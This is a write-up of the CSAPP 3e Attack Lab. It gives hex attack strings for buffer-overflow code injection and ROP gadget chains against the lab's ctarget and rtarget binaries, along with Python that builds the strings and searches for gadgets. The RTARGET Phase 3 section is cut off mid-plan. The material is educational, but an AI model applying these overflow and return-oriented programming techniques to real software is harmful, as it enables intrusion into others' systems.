In-depth explanation of the CSAPP:3e Attack Lab: experiment record


Read the lab handout, then start the Attack Lab.

CTARGET Phase 1

The first attack phase requires calling the existing function touch1. This is simple: overwrite the saved return address on the stack with the start address of touch1.


First, use gdb to debug ctarget and disassemble the assembly code of getbuf:

It can be seen that a stack frame of 0x28 (decimal 40) bytes is allocated here. Because the stack grows toward lower addresses, the start address of touch1 should be stored at %rsp+40, where the saved return address sits. Disassembling touch1 shows that its start address is 0x4017c0:
Therefore, the first 40 bytes of the constructed string are arbitrary (but must not be 0x0a, because 0x0a is the newline character and ctarget treats a newline as the end of its input), followed by 0x4017c0 (note that it must be written in little-endian byte order):
Save it as phase1.txt and run it:
Phase 1 passed.

CTARGET Phase 2

Phase 2 requires a small piece of code to be injected and the function touch2(unsigned) to be called with an argument. First of all, if you look at touch2 in the lab handout, you need to know your cookie:

The cookie is a random number generated by the program and displayed when ctarget starts. Disassemble touch2 and find that its start address is 0x4017ec:
We are going to inject the code into the stack frame of getbuf. The handout says that the stack address of ctarget is fixed, which makes code injection easier. Under gdb, the address of the buffer in the stack frame is found to be 0x5561dc78:

First, list the information at hand:

    Stack address:           0x5561dc78
    touch2 function address: 0x00000000004017ec
    Cookie:                  0x59b997fa

Then write the injected code. Its purpose is to call touch2 with the cookie as the argument:

fun2:
    movl $0x59b997fa,%edi
    pushq $0x4017ec
    ret

Assemble it into an object file, then use objdump -d to disassemble it into phase2.txt:

phase2.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <fun2>:
   0:   bf fa 97 b9 59          mov    $0x59b997fa,%edi
   5:   68 ec 17 40 00          pushq  $0x4017ec
   a:   c3                      retq

Keep the binary part, pad it to 40 bytes, then append the stack frame (buffer) address as the return address to get phase2.txt:

bf fa 97 b9 59             /* movl $0x59b997fa,%edi */
68 ec 17 40 00             /* pushq $0x4017ec */
c3                         /* retq */
ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
ef ef ef ef ef ef ef ef ef ef ef ef ef             /* 29 bytes of padding, up to 40 */
78 dc 61 55 00 00 00 00    /* return address: start of the buffer, 0x5561dc78 */

Run it:


PS: the injected program can also be written as follows:

fun2:
    movl $0x59b997fa,%edi
    subq $8,%rsp
    movq $0x4017ec,(%rsp)
    ret

CTARGET Phase 3

Read the handout first. It emphasizes that the stack frame allocated by getbuf may be overwritten by the hexmatch and strncmp functions. So we choose the parent stack frame of getbuf, that is, the stack frame of test, to store our string. We will never return to test anyway; execution ends inside the body of touch3.

First of all, we know the buffer address 0x5561dc78 from the previous phase. Disassembling touch3 shows that its start address is 0x4018fa. Since we decided to store the string in the parent stack frame, it sits beyond the 40-byte buffer and the 8-byte return address (from the previous phase we know getbuf allocates 40 bytes of stack frame), so the string starts 48 bytes past the buffer, at 0x5561dc78 + 0x30 = 0x5561dca8. This is the value the injected movq encodes.

So let's write the injection code:

    movq $0x5561dca8,%rdi
    pushq $0x4018fa
    retq

After assembly, fill the 27 bytes of padding between the code and the return address, and append the ASCII string at the end:

48 c7 c7 a8 dc 61 55       /* movq $0x5561dca8,%rdi */
68 fa 18 40 00             /* pushq $0x4018fa */
c3                         /* retq */
ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
ef ef ef ef ef ef ef ef ef ef ef                   /* unused 27 bytes */
78 dc 61 55 00 00 00 00    /* return address: start of the code area */
35 39 62 39 39 37 66 61 00 /* ASCII bytes of "59b997fa" plus the terminating NUL; this lands in test's stack frame */

Run the program; it passes.
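The three CTARGET strings above can be regenerated and checked mechanically. The Python below is an added example, not code from the original record or from the lab; it assumes the values the record reports (a 40-byte buffer at 0x5561dc78, touch1/touch2/touch3 at 0x4017c0/0x4017ec/0x4018fa, cookie 0x59b997fa) and the instruction encodings shown in the objdump output. It rebuilds each string from its pieces, rejects any string containing the 0x0a newline byte that would cut the input short, computes the Phase 3 string address from the frame layout instead of by hand, and formats the result as the space-separated hex text that the lab's hex2raw tool reads.

```python
import struct

FILLER = 0xEF   # the record pads unused buffer bytes with 0xef; any value except 0x0a would do
NEWLINE = 0x0A  # Gets() stops reading at '\n', so this byte can never appear in the string


def le64(value):
    """8-byte little-endian encoding, the form a 64-bit address takes on the stack."""
    return struct.pack("<Q", value)


def build_attack_string(buf_len, code, return_addr, tail=b""):
    """Assemble: injected code (may be empty) | filler up to buf_len | return address | tail.

    buf_len is the size of getbuf's buffer (0x28 = 40 in this record). The return
    address overwrites the saved return address just above the buffer; tail lands
    in the caller's frame, which is where Phase 3 stores its string.
    """
    if len(code) > buf_len:
        raise ValueError("injected code does not fit in the buffer")
    data = code + bytes([FILLER]) * (buf_len - len(code)) + le64(return_addr) + tail
    if NEWLINE in data:
        raise ValueError("attack string contains 0x0a, which would end the input early")
    return data


def to_hex_text(data, per_line=16):
    """Render bytes as space-separated hex text, the form hex2raw accepts."""
    lines = []
    for i in range(0, len(data), per_line):
        lines.append(" ".join(f"{b:02x}" for b in data[i:i + per_line]))
    return "\n".join(lines)


def string_address(frame_base, buf_len):
    """Address of the tail (the Phase 3 string): past the buffer and the 8-byte return address."""
    return frame_base + buf_len + 8


# Values taken from the record: buffer size, buffer address, function entry points, cookie.
BUF_LEN = 40
BUF_ADDR = 0x5561dc78
TOUCH1, TOUCH2, TOUCH3 = 0x4017c0, 0x4017ec, 0x4018fa
COOKIE = 0x59b997fa

# Phase 1: nothing but filler and the new return address.
phase1 = build_attack_string(BUF_LEN, b"", TOUCH1)

# Phase 2: movl $cookie,%edi (bf imm32); pushq $touch2 (68 imm32); ret (c3), then return into the buffer.
phase2_code = (bytes([0xBF]) + struct.pack("<I", COOKIE)
               + bytes([0x68]) + struct.pack("<I", TOUCH2) + b"\xc3")
phase2 = build_attack_string(BUF_LEN, phase2_code, BUF_ADDR)

# Phase 3: movq $string_addr,%rdi (48 c7 c7 imm32); pushq $touch3; ret, with the cookie's
# ASCII form placed in the caller's frame right after the return address.
str_addr = string_address(BUF_ADDR, BUF_LEN)
phase3_code = (b"\x48\xc7\xc7" + struct.pack("<I", str_addr)
               + bytes([0x68]) + struct.pack("<I", TOUCH3) + b"\xc3")
phase3 = build_attack_string(BUF_LEN, phase3_code, BUF_ADDR, tail=b"59b997fa\x00")

if __name__ == "__main__":
    for name, s in (("phase1", phase1), ("phase2", phase2), ("phase3", phase3)):
        print(f"== {name} ({len(s)} bytes, string address 0x{str_addr:x}) ==")
        print(to_hex_text(s))
```

Running the script prints the three strings in the same byte order as the record. The string_address computation is the point worth checking: the Phase 3 pointer is 48 bytes past the buffer (40 bytes of buf plus the 8-byte return address), which is exactly the a8 dc 61 55 immediate in the injected movq.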


RTARGET Phase 2

RTARGET Phase 2 requires finding, in the existing code, the gadgets needed to repeat the CTARGET Phase 2 attack. First, in gdb ./rtarget, type disas /r start_farm,mid_farm to view all the instructions and their encodings between start_farm and mid_farm:

Because the above code does not contain the cookie value 0x59b997fa I need, I have to place the value on the stack, pop it with a popq instruction and copy it into the %rdi register.

Looking at the disassembly, you need to find a popq instruction and a movq instruction, so the work is divided into two gadgets. Each of these two instructions must be followed directly by the 0xc3 (retq) return instruction, with at most 0x90 (nop) bytes in between.

Let's find Gadget 1 first. The encoding of popq is 0x58 to 0x5f. Look at the figure above and find that the bytes starting at address 0x4019cc meet the requirement:

58 90 c3: these three bytes encode popq %rax, nop and retq respectively.

Now Gadget 2. The encoding of movq starts with 0x48 0x89, so it is quickly located at the start address 0x4019a2. The four bytes at this address, 48 89 c7 c3, encode movq %rax,%rdi; retq, which is exactly what we need.

Roughly, the stack is laid out as follows:

Address    Purpose                        Content
%rsp+32    touch2 function start address  0x4017ec
%rsp+24    Gadget 2 start address         0x4019a2
%rsp+16    Cookie value                   0x59b997fa
%rsp+8     Gadget 1 start address         0x4019cc

Therefore, the attack string is constructed as follows:

ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
ef ef ef ef ef ef ef ef                            /* 40 bytes of padding */
cc 19 40 00 00 00 00 00    /* Gadget 1: popq %rax; nop; retq */
fa 97 b9 59 00 00 00 00    /* cookie, popped into %rax */
a2 19 40 00 00 00 00 00    /* Gadget 2: movq %rax,%rdi; retq */
ec 17 40 00 00 00 00 00    /* touch2 */

Run the program; it passes:


RTARGET Phase 3

This phase is similar to RTARGET Phase 2: it also requires combining existing code to achieve what CTARGET Phase 3 did. First, disassemble all the instructions from start_farm to end_farm, then mark every usable instruction according to the encoding table in the lab handout (as shown below):


Address                Bytes                 Instruction
                       b8 01 00 00 00        mov    $0x1,%eax
0x0000000000401999:    c3                    retq
0x000000000040199a:    b8 fb 78 90 90        mov    $0x909078fb,%eax
0x000000000040199f:    c3                    retq
0x00000000004019a0:    8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
0x00000000004019a6:    c3                    retq
0x00000000004019a7:    8d 87 51 73 58 90     lea    -0x6fa78caf(%rdi),%eax   // 58 90 c3: popq %rax; nop; ret
0x00000000004019ad:    c3                    retq
0x00000000004019ae:    c7 07 48 89 c7 c7     movl   $0xc7c78948,(%rdi)
0x00000000004019b4:    c3                    retq
0x00000000004019b5:    c7 07 54 c2 58 92     movl   $0x9258c254,(%rdi)
0x00000000004019bb:    c3                    retq
0x00000000004019bc:    c7 07 63 48 8d c7     movl   $0xc78d4863,(%rdi)
0x00000000004019c2:    c3                    retq
0x00000000004019c3:    c7 07 48 89 c7 90     movl   $0x90c78948,(%rdi)      // 48 89 c7: movq %rax,%rdi; 89 c7: movl %eax,%edi; 90: nop
0x00000000004019c9:    c3                    retq
0x00000000004019ca:    b8 29 58 90 c3        mov    $0xc3905829,%eax
0x00000000004019cf:    c3                    retq
0x00000000004019d0:    b8 01 00 00 00        mov    $0x1,%eax
0x00000000004019d5:    c3                    retq
0x00000000004019d6:    48 8d 04 37           lea    (%rdi,%rsi,1),%rax
0x00000000004019da:    c3                    retq
0x00000000004019db:    b8 5c 89 c2 90        mov    $0x90c2895c,%eax        // 89 c2 90: movl %eax,%edx; nop
0x00000000004019e0:    c3                    retq
0x00000000004019e1:    c7 07 99 d1 90 90     movl   $0x9090d199,(%rdi)
0x00000000004019e7:    c3                    retq
0x00000000004019e8:    8d 87 89 ce 78 c9     lea    -0x36873177(%rdi),%eax
0x00000000004019ee:    c3                    retq
0x00000000004019ef:    8d 87 8d d1 20 db     lea    -0x24df2e73(%rdi),%eax
0x00000000004019f5:    c3                    retq
0x00000000004019f6:    b8 89 d1 48 c0        mov    $0xc048d189,%eax
0x00000000004019fb:    c3                    retq
0x00000000004019fc:    c7 07 81 d1 84 c0     movl   $0xc084d181,(%rdi)
0x0000000000401a02:    c3                    retq
0x0000000000401a03:    8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax  // 48 89 e0: movq %rsp,%rax
0x0000000000401a09:    c3                    retq
0x0000000000401a0a:    c7 07 88 c2 08 c9     movl   $0xc908c288,(%rdi)
0x0000000000401a10:    c3                    retq
0x0000000000401a11:    8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax  // 89 ce 90 90: movl %ecx,%esi; nop; nop
0x0000000000401a17:    c3                    retq
0x0000000000401a18:    b8 48 89 e0 c1        mov    $0xc1e08948,%eax
0x0000000000401a1d:    c3                    retq
0x0000000000401a1e:    8d 87 89 c2 00 c9     lea    -0x36ff3d77(%rdi),%eax
0x0000000000401a24:    c3                    retq
0x0000000000401a25:    8d 87 89 ce 38 c0     lea    -0x3fc73177(%rdi),%eax  // 89 ce 38 c0: movl %ecx,%esi; cmpb %al,%al (cmpb only sets flags here, so it is equivalent to a nop)
0x0000000000401a2b:    c3                    retq
0x0000000000401a2c:    c7 07 81 ce 08 db     movl   $0xdb08ce81,(%rdi)
0x0000000000401a32:    c3                    retq
0x0000000000401a33:    b8 89 d1 38 c9        mov    $0xc938d189,%eax        // 89 d1 38 c9: movl %edx,%ecx; cmpb %cl,%cl (again equivalent to a nop)
0x0000000000401a38:    c3                    retq
0x0000000000401a39:    8d 87 c8 89 e0 c3     lea    -0x3c1f7638(%rdi),%eax
0x0000000000401a3f:    c3                    retq
0x0000000000401a40:    8d 87 89 c2 84 c0     lea    -0x3f7b3d77(%rdi),%eax  // 89 c2 84 c0: movl %eax,%edx; testb %al,%al (testb only sets flags, so it is equivalent to a nop)
0x0000000000401a46:    c3                    retq
0x0000000000401a47:    8d 87 48 89 e0 c7     lea    -0x381f76b8(%rdi),%eax
0x0000000000401a4d:    c3                    retq
0x0000000000401a4e:    b8 99 d1 08 d2        mov    $0xd208d199,%eax
0x0000000000401a53:    c3                    retq
0x0000000000401a54:    b8 89 c2 c4 c9        mov    $0xc9c4c289,%eax
0x0000000000401a59:    c3                    retq
0x0000000000401a5a:    c7 07 48 89 e0 91     movl   $0x91e08948,(%rdi)
0x0000000000401a60:    c3                    retq
0x0000000000401a61:    8d 87 89 ce 92 c3     lea    -0x3c6d3177(%rdi),%eax
0x0000000000401a67:    c3                    retq
0x0000000000401a68:    b8 89 d1 08 db        mov    $0xdb08d189,%eax
0x0000000000401a6d:    c3                    retq
0x0000000000401a6e:    c7 07 89 d1 91 c3     movl   $0xc391d189,(%rdi)
0x0000000000401a74:    c3                    retq
0x0000000000401a75:    c7 07 81 c2 38 d2     movl   $0xd238c281,(%rdi)
0x0000000000401a7b:    c3                    retq
0x0000000000401a7c:    c7 07 09 ce 08 c9     movl   $0xc908ce09,(%rdi)
0x0000000000401a82:    c3                    retq
0x0000000000401a83:    8d 87 08 89 e0 90     lea    -0x6f1f76f8(%rdi),%eax
0x0000000000401a89:    c3                    retq
0x0000000000401a8a:    8d 87 89 c2 c7 3c     lea    0x3cc7c289(%rdi),%eax
0x0000000000401a90:    c3                    retq
0x0000000000401a91:    b8 88 ce 20 c0        mov    $0xc020ce88,%eax
0x0000000000401a96:    c3                    retq
0x0000000000401a97:    c7 07 48 89 e0 c2     movl   $0xc2e08948,(%rdi)
0x0000000000401a9d:    c3                    retq
0x0000000000401a9e:    8d 87 89 c2 60 d2     lea    -0x2d9f3d77(%rdi),%eax
0x0000000000401aa4:    c3                    retq
0x0000000000401aa5:    b8 8d ce 20 d2        mov    $0xd220ce8d,%eax
0x0000000000401aaa:    c3                    retq
0x0000000000401aab:    c7 07 48 89 e0 90     movl   $0x90e08948,(%rdi)
0x0000000000401ab1:    c3                    retq
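The annotations in the listing (58 90 c3 read as popq %rax; nop; ret, 48 89 xx as movq, 89 xx as movl, and the cmpb/testb byte pairs treated as nops) can be applied by a small decoder instead of by eye, which also serves the Gadget 1 / Gadget 2 search of RTARGET Phase 2. The Python below is an added example, not part of the original record or of the lab. It implements only the encodings the handout table defines (movq, movl, popq, nop, ret and the two-byte andb/orb/cmpb/testb "functional nops") and treats every other byte as undecodable, so a candidate is accepted only if every byte from its start to a ret decodes cleanly. The FARM bytes are transcribed from the listing above for 0x4019a0 through 0x4019cf; the 0x4019cc and 0x4019a2 gadgets used in Phase 2 fall out of it.

```python
# Register names in x86-64 ModRM order: index 0..7 = rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi.
REG64 = ["%rax", "%rcx", "%rdx", "%rbx", "%rsp", "%rbp", "%rsi", "%rdi"]
REG32 = ["%eax", "%ecx", "%edx", "%ebx", "%esp", "%ebp", "%esi", "%edi"]
REG8 = ["%al", "%cl", "%dl", "%bl"]
# Two-byte "functional nops" from the handout table: they only change flags, never a register.
FUNC_NOP = {0x20: "andb", 0x08: "orb", 0x38: "cmpb", 0x84: "testb"}
NOP_LIKE = ("nop", "ret") + tuple(FUNC_NOP.values())


def _regreg(modrm):
    """Split a register-to-register ModRM byte (0xc0..0xff) into (src, dst) indices."""
    return (modrm >> 3) & 7, modrm & 7


def decode_one(code, i):
    """Decode one instruction of the handout's subset at code[i].
    Returns (text, length), or None if the bytes are not one of those encodings."""
    b = code[i]
    if b == 0xC3:
        return "ret", 1
    if b == 0x90:
        return "nop", 1
    if 0x58 <= b <= 0x5F:
        return f"popq {REG64[b - 0x58]}", 1
    if b == 0x48 and i + 2 < len(code) and code[i + 1] == 0x89 and code[i + 2] >= 0xC0:
        src, dst = _regreg(code[i + 2])
        return f"movq {REG64[src]},{REG64[dst]}", 3
    if b == 0x89 and i + 1 < len(code) and code[i + 1] >= 0xC0:
        src, dst = _regreg(code[i + 1])
        return f"movl {REG32[src]},{REG32[dst]}", 2
    if b in FUNC_NOP and i + 1 < len(code) and code[i + 1] >= 0xC0:
        src, dst = _regreg(code[i + 1])
        if src == dst and src < 4:  # andb/orb/cmpb/testb %r,%r with r in al..bl
            return f"{FUNC_NOP[b]} {REG8[src]},{REG8[src]}", 2
    return None


def decode_gadget(code, start, max_bytes=8):
    """Decode from code[start] until a ret. Returns the instruction list, or None if
    the bytes stop decoding cleanly or no ret appears within max_bytes."""
    insns, i = [], start
    while i < len(code) and i - start < max_bytes:
        d = decode_one(code, i)
        if d is None:
            return None
        text, n = d
        insns.append(text)
        i += n
        if text == "ret":
            return insns
    return None


def find_gadgets(code, base):
    """Map address -> instruction list for every offset that decodes into a
    ret-terminated gadget doing more than nops and flag-only instructions."""
    found = {}
    for off in range(len(code)):
        g = decode_gadget(code, off)
        if g and any(not insn.startswith(NOP_LIKE) for insn in g):
            found[base + off] = g
    return found


# Bytes transcribed from the listing for 0x4019a0 .. 0x4019cf (48 bytes).
FARM_BASE = 0x4019a0
FARM = bytes.fromhex(
    "8d874889c7c3" "c3" "8d8751735890" "c3" "c7074889c7c7" "c3"
    "c70754c25892" "c3" "c70763488dc7" "c3" "c7074889c790" "c3"
    "b8295890c3" "c3"
)

if __name__ == "__main__":
    for addr, insns in sorted(find_gadgets(FARM, FARM_BASE).items()):
        print(f"0x{addr:x}: {'; '.join(insns)}")
```

Besides the two gadgets the record uses, the scan shows why some look-alikes are rejected: 48 89 c7 at 0x4019b0 is followed by c7 and 58 at 0x4019b9 by 92, neither of which the table decodes, so no ret is reached and the candidate is dropped. The same decoder applied to the bytes annotated later in the listing (48 89 e0, 89 ce 38 c0, and so on) confirms those annotations.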

Then we can roughly determine the attack scheme: put the string on the stack. To find the string's location, read the current stack pointer and add the string's offset within the stack to form the string's address. The plan is roughly as follows (A -> B means assign A to B): %rsp -> popq %rax; %eax -> %rdi + %rsi ->

The stack is laid out as follows (addresses grow upward):

Slot                Content
Actual string       the string itself
Function address    touch3 start address
Offset value        string offset
Gadget              popq %rax

Finally, calculate the string offset. Note that when the first gadget (%rsp -> %rax) executes, %rsp actually points to the address of the second gadget, so the string offset should be 9 x 8 bytes = 72 bytes, that is, the hexadecimal value 0x48.

The attack string is constructed as follows (the first 40 ef bytes fill buf, followed by the corresponding stack contents in reverse order; Gadget stands for the gadget's address):